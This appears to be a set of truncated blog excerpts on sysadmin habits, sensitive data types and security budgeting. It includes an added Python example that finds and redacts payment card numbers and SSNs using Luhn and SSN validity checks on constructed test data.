Not all habits are bad. Sure, you should ease up on the alcohol, give up smoking and stop biting your nails, but make sure you take some time to develop some good habits too. Take a look at the practices below, perform them regularly, and before long they will become second nature. You will then be able to rank yourself alongside the best system administrators. Even better, you should find you have far fewer bad days, and even some when everything runs smoothly without a hitch.

Develop a ticket system and keep on top of requests

You are likely to receive more requests for assistance than you can deal with in a single day, and if you are regularly flooded with requests some will invariably be forgotten. Sometimes you will deal with an issue only for the user to complain that you have not. It is useful to be able to prove that you dealt with a problem in a timely manner. A ticketing system lets you do this, helps you prioritize tasks, and ensures you never forget a reported system or computer issue. The system need not be expensive or complicated. If you work alone in a small business you can set up a very simple MS Access database to log all requests; even a spreadsheet or a Word document would suffice. The important thing is that every request is logged. If your company employs more than one system administrator, you will probably need something more capable, and helpdesk software is likely to be required once you are dealing with hundreds of requests that must be allocated to staff members and followed up. Making sure all queries have been answered and all reported problems resolved is a nightmare without such a system in place.

Keep a log of your activity

If you ever have to justify how you have spent your time, your ticketing system is your friend.
You can show the volume of requests you have received and resolved on a daily basis, and use that information to show that your time has been well spent. One clever way of reducing the requests you get is to log each request and send the user (and his or her line manager) an email...

Securing Data: What Data are Sensitive and Must be Better Protected?

Hackers and malicious insiders are trying to break through security defenses to get their hands on sensitive data, but what data are they actually looking for, and which data need to be better protected? Federal laws require physical, technical and administrative controls to be put in place to keep certain data secure, and failing to protect those data types can lead to serious trouble regardless of whether a hacker ever compromises your network. Some data types are obvious, others less so. Credit card numbers, bank account information, Social Security numbers and healthcare data all require robust security measures. Have you made sure that each of the following 9 data types has appropriate controls in place to prevent unauthorized access?

Financial Data

The goal of many hackers and cybercriminals is to obtain bank account information and the logins and passwords used to access online accounts; once they have this information they can make transfers and empty accounts. Credit and debit card numbers are also sought in order to make online purchases and create counterfeit cards. PINs, if stored, and answers to security questions must be protected with equally robust controls.

Medical Data

The Health Insurance Portability and Accountability Act (HIPAA) requires all covered entities to put physical, technical and administrative controls in place to keep medical data secure. In the wrong hands, medical data can be used to discriminate and defame; it is also used in spear phishing campaigns and combined with other data to commit fraud. Failure to secure these data is a violation of the HIPAA Rules and can result in substantial financial penalties. Criminal charges can even be filed against individuals for failing to secure highly sensitive data.

Driver's License Numbers

A valid driver's license number can be used to create fake driving licenses.
These are not only useful to people who are not legally allowed to drive; they can be used to obtain other forms of identification and to commit identity theft and fraud.

Student Data

Student data is increasingly being sought by criminals...
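Knowing which data types matter is only useful if you can find them where they should not be, such as ticket notes, exports and shared drives. The following added example (not code from the original article) does a first pass for two of the types discussed above, payment card numbers and Social Security numbers, and shows why pattern matching alone is not enough: a card-shaped digit string is only reported if it passes the Luhn check, and an SSN-shaped string only if its parts are ones the Social Security Administration could actually issue. The sample text is constructed, and the card numbers in it are well-known test numbers, not real accounts.

```python
"""Find payment card numbers and SSNs in free text, with false-positive control.

Added example, not part of the original article. SAMPLE_TEXT is constructed;
the card numbers in it are publicly known test numbers that pass the Luhn check,
not real accounts.
"""
import re

# 13 to 19 digits, optionally separated by spaces or hyphens.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
# Social Security number in the usual AAA-GG-SSSS layout.
SSN_RE = re.compile(r"\b(\d{3})-(\d{2})-(\d{4})\b")

SAMPLE_TEXT = """Ticket 4471: customer paid with card 4111 1111 1111 1111 (exp 09/27).
Order ref 1234 5678 9012 3456 shipped 2023-11-07, phone 555-867-5309.
Employee SSN on file: 123-45-6789; legacy record shows 000-12-3456.
Second card on account: 5500-0000-0000-0004."""


def luhn_valid(digits):
    """Luhn checksum used by payment card numbers.

    From the right, double every second digit, subtract 9 if the result is
    over 9, then check the total is a multiple of 10.
    """
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def plausible_ssn(area, group, serial):
    """Structural rules for issued SSNs: area is not 000, 666 or 900-999,
    group is not 00 and serial is not 0000."""
    a = int(area)
    return a not in (0, 666) and a < 900 and group != "00" and serial != "0000"


def find_sensitive(text):
    """Return (kind, matched_text) for every validated card number and SSN."""
    findings = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if luhn_valid(digits):
            findings.append(("card", m.group()))
    for m in SSN_RE.finditer(text):
        if plausible_ssn(*m.groups()):
            findings.append(("ssn", m.group()))
    return findings


def redact(text):
    """Mask every finding except its last four characters."""
    for _kind, value in find_sensitive(text):
        text = text.replace(value, "*" * (len(value) - 4) + value[-4:])
    return text


if __name__ == "__main__":
    for kind, value in find_sensitive(SAMPLE_TEXT):
        print(f"{kind}: {value}")
    print(redact(SAMPLE_TEXT))
```

In the sample, the 16-digit order reference looks exactly like a card number to the regular expression but fails Luhn and is left alone, and the 000-prefixed SSN is rejected as one that could never have been issued; the date and phone number never match in the first place.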

Business Risk and Security Risk Should Be Discussed in the Same Context

You are faced with a seemingly insurmountable problem. Your job requires you to keep the business secure from external attacks, and you must also deal with the threat from malicious insiders. It is your responsibility, and your job may well be on the line if something goes wrong and data are stolen or your network is infected with malware. Unfortunately, you have not had a budget increase and cannot afford the software solutions necessary to protect the business. This is a problem faced by many IT professionals: management understands there is a risk, and knows the risk is considerable, yet expects you to work your magic with your hands tied behind your back. You are not a magician, so if management wants to be properly protected it is your job to convince the powers that be that you need a bigger budget. We know you have already tried. What you need to do, therefore, is improve how you communicate the problem. You need to find a way to convince management that additional funding is absolutely essential, and one of the best ways of doing so is to explain that security risk is business risk.

You are not alone: 50% of IT professionals work with inadequate security measures

IT department funding is almost always limited. It is rarely possible to buy the highest quality equipment and the best security measures and still have enough staff to perform all of the required work. So if you are stressed, suffering a critical lack of funding or desperately understaffed, you are not alone. The situation has recently been assessed by the Ponemon Institute, whose latest survey asked IT security professionals about the level of security in their organization. It appears that when it comes to cybersecurity protections, management and IT department heads are often not on the same page. The survey was large.
Over 5,000 IT professionals sent back responses, and more than 2,500 of them said their cybersecurity measures were inadequate. The problem for many was that upper management simply did not understand just how important it was to improve...